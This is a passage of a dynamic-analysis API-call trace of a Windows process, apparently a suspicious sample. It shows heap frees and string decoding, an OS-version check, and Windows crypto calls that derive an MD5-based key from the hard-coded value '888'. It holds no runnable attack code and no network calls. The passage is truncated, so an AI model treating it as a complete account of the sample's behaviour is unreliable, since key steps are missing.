| out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0212.286] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0212.287] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.287] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.287] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.287] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.287] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0212.288] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0212.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0212.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0212.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0212.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.288] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0212.288] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0212.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0212.288] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.288] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.288] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.288] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.288] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0212.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0212.288] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.288] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.288] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.288] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.289] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.289] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.289] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f00, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0212.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0212.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7140, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0212.289] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c220) returned 1 [0212.290] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.290] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.290] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0212.290] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.290] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0212.290] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.290] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.290] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.290] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.290] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.290] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.290] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.290] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.290] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.290] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.290] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.290] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.290] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.290] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.290] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.291] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.291] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0212.291] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.291] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0212.291] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.291] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.291] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.291] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.291] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.291] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.291] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.291] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.291] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.291] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.291] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.291] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.292] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.292] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.292] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.292] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.292] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.292] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.292] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.292] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.292] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.292] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.292] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.292] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.292] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.292] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.292] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.292] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.292] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.293] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.293] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.293] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.293] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.293] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.293] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.293] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.293] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.293] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab530, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0212.293] CryptCreateHash (in: hProv=0xa7c220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0212.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a726a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.293] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0212.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72778, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.294] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.294] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.294] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.294] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.294] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.294] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.294] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0212.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab650, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0212.294] CryptHashData (hHash=0x9e1c38, pbData=0x2a726a8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0212.294] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.294] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.294] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.294] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.294] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.294] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.294] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.294] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.294] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.294] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.295] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.295] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.295] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, 